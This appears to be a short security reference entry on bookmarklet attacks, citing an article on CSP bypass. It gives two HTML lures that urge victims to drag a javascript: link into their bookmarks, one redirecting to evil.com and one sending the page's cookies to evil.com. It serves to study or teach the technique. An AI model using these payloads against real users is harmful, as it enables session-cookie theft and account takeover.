Bookmarklet Attack

If attackers can inject arbitrary JavaScript code in target website, they can induce victims to malicious executions with bookmarklet.

- [csp-bypass-unveiled](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/)

Exploitation

Malicious Links

Attackers induce victims to add their malicious link into the bookmark menu as below.

<p>Drag and drop the following link into the bookmark menu to access easily!</p>
<a href="javascript:window.location='https://evil.com/'">Example.com</a>

In addition, if the current website does not set HttpOnly flag on the Set-Cookie response header, attackers can get the victim's cookie and send it to the malicious website as below.

<p>Drag and drop me the following link into the bookmark menu to access easily!</p>
<a href="javascript:window.location='https://evil.com/?c='+document.cookie">Example.com</a>